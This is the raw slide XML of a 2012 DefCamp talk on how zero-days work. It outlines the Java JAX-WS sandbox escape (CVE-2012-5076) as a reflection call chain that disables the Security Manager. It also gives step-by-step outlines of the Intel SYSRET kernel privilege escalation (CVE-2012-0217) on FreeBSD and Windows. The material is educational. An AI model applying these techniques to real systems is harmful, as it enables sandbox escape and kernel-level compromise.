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>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="68" d="100"/>
          <a:sy n="68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43372-C719-494F-8775-DE4F350CAFE0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4ECD4-A4A4-40D9-868A-05B0545FF4E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4ECD4-A4A4-40D9-868A-05B0545FF4E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37B2406-8A57-4F28-AC18-A0A5C20C61F3}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>01/12/2012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D695A5D-E0AA-421B-8C88-B3E72820F2F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288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92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How does a 0day work?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="480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971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Ionut Gabriel Popescu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35814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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nytro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="41910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https://www.rstcenter.com/forum/</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7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1524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92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Classes and methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="320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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="13070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92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- GenericConstructor</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB">
              <a:solidFill>
                <a:srgbClr val="92D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688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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GenericConstructor.create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069068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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sun.invoke.anon.AnonymousClassLoader</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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28194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rgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- ManagedObjectManagerFactory</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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2120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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ManagedObjectManagerFactory.getMethod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35930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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Method</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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3974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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Method.invoke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4355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92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Class</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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4736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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Class.newInstance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365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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payload.main(null);</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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243840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B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sun.invoke.anon.AnonymousClassLoader.loadClass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92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How does this 0day work?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="320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22976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Create an instance of “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sun.invoke.anon.AnonymousClassLoader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>”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09600" y="26670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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sun.invoke.anon.AnonymousClassLoader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>” – Restricted, privileged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81000" y="31358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2. Call “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>loadClass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>” method from “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sun.invoke.anon.AnonymousClassLoader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>”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 Abuse of “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GenericConstructor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>” and “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ManagedObjectManagerFactory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>”</a:t>
            </a:r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09600" y="1524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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GenericConstructor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>” and “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ManagedObjectManagerFactory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>” – bypass Java security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516868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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>loadClass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>” – Loads a byte[] stream class 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81000" y="4038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3. Call the default constructor of our class, loaded using “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AnonymousClassLoader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> 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33400" y="47244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Since it is called from a privileged code, it will run privileged, disable Security Manager</a:t>
            </a:r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81000" y="5410200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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enjoy</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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8028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Do whatever you want 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DEFCAMP </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>2012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5146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Questions?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="48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DEFCAMP </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>2012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9099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CVE-2012-0217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9118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Intel SYSRET privilege escalation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7642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Discovered by: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Rafal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Wojtczuk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14526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Disclosed: 12 April 2012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526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Patched: 12 June 2012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2907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Affected operating systems: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2882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FreeBSD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35930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Windows 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43550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64 bit systems are vulnerable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473606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Complicated, tricky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511706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Intel x64 processors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DEFCAMP </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>2012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39740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Linux (NO - CVE-2006-0744 - DOS)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32962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Intro x64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Registers extended to 64 bits: RAX, RBX… RIP, RSP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6764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AH/L = 1B, AX = 2 bytes, EAX = 4 bytes, RAX = 8 bytes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209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general purpose registers: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667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R8, R9, R10, R11, R12, R13, R14, R15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calling convention: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35052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 RCX – 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> argument</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> RDX – 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> argument</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> R8 – 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> argument</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> R9 – 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> argument</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Still requires stack to be reserved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DEFCAMP </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>2012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1054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x64 replaced </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>gs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – TIB (Thread Information Block)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680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Why?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Because of “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sysret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” instruction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743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Intel follows AMD 64 standard (not exactly)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600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Older system calls – very slow: Interrupts (Ex. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 0x80)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981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Interrupts need to use IDT (Interrupt Dispatch Table)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2373868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AMD: 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sysret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Intel: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sysenter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sysexit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (saves RIP in RCX)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124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Just 48 bits are used (not all 64) = 256 TB of memory available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505200"/>
            <a:ext cx="731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Must use canonical addresses (bits 48-63 == 47)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DEFCAMP </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>2012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3886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 #GP (General Protection) is raised for non-canonical RIP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42672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On exception, exception record is pushed on the stack: error code, Saved: RIP, CS, RFLAGS, RSP, SS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4876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Usermode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> stack is changed to kernel mode stack – “safe” one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5257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If RSP is invalid, #DF (double fault) is raised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5582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Privileges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16668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Main purpose: full privileges (no limitations)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976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Rings: 0, 1, 2, 3 – Because segment descriptor DPL == 2 bits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678668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Windows and Linux uses just 0 and 3 (compatibility)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4406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Change from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>usermode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to kernel mode with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and reverse: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82166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RIP is in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>usermode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, RSP is in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>usermode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>syscall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4202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RIP - kernel mode, RSP - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>usermode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (replaced during system call), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sysret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059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Low privilege to high privilege: system calls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DEFCAMP </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>2012</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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63442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How does this 0day work?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792069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What can happen during </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sysret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: interrupts,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173069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Interrupts are not blocked, but are forbidden (one MSR)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DEFCAMP </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>2012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554069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How about exceptions? #GP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935069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On AMD, #GP is not raised for non-canonical address in RCX (safe)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316069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On Intel, if we can have RIP (depends on OS how) to a non-canonical address before </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sysret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, #GP will be raised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343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Use RSP to overwrite kernel structure to execute code with ring0 privileges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3962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#GP is raised while CPU is in privileged mode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524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92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Operating system specific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521023"/>
            <a:ext cx="746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Place a “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>” (0x0f, 0x05) right before a non-canonical address ((1 &lt;&lt; 47) - 2)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FreeBSD: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825823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Set RSP to a calculated value to make sure the exception record pushed on stack will overwrite #PF (Page Fault)’s “target” offset (raised) with a pointer to our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>kernelmode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> payload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359223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#PF will be raised (because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>gs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>usermode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>) and will execute our payload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DEFCAMP </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>2012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2740223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4. Recover overwritten IDTs to avoid a triple fault (machine reboot)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328678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Windows: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3820180"/>
            <a:ext cx="701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Create an UMS scheduled thread (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>EnterUmsSchedulingMode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4124980"/>
            <a:ext cx="723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2. Set RIP and RSP from TEB (Thread </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Environmet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> Block) to a non-canonical address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442978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3. Create a new thread that will continuously overwrite return address from #GP stack after it writes it but before it is read (after function call)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51771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Enjoy!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25146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92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Questions?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="48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DEFCAMP </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>2012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668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92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Contents</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="400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052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3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" smtClean="0"/>
              <a:t>CVE-2012-0217</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="28194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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" smtClean="0"/>
              <a:t>CVE-2012-5076</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4191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4. Questions?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="21336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1. Why?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6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3810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92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Why</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="400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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0"/>
              <a:t>Not so many interested people</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="2362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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0"/>
              <a:t>A very interesting subject</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="28956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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0"/>
              <a:t>Unlimited possibilities: Windows/Linux, Java…</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="1066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to learn how do 0days work?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3400" y="3429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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0"/>
              <a:t>Highly technical skills </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="3962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/>
              <a:t>- Deep understanding of “internals”</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="5029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/>
              <a:t>- Not so complicated at all</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="4495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/>
              <a:t>- Don’t be a script kiddie – Metasploit?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2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05825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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Java Applet JAX-WS Remote Code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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="100078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92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CVE-2012-5076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4098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Exploited: November 2012</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="386709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smtClean="0"/>
              <a:t>Java: Version 7 update 7 (7u7)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4324290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Fastly included by: BlackHole, Nuclear Pack, RedKit…</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="203829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Disclosure: 16 Oct 2012</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="249549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Discovered by: Unknown</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="298346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Oracle patch: October 2012</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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78149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Metasploit module: juan vazquez</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="523869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Also known as: Java drive-by</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Browser Java applets can NOT:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="320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i="1" smtClean="0"/>
              <a:t> Access filesystem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
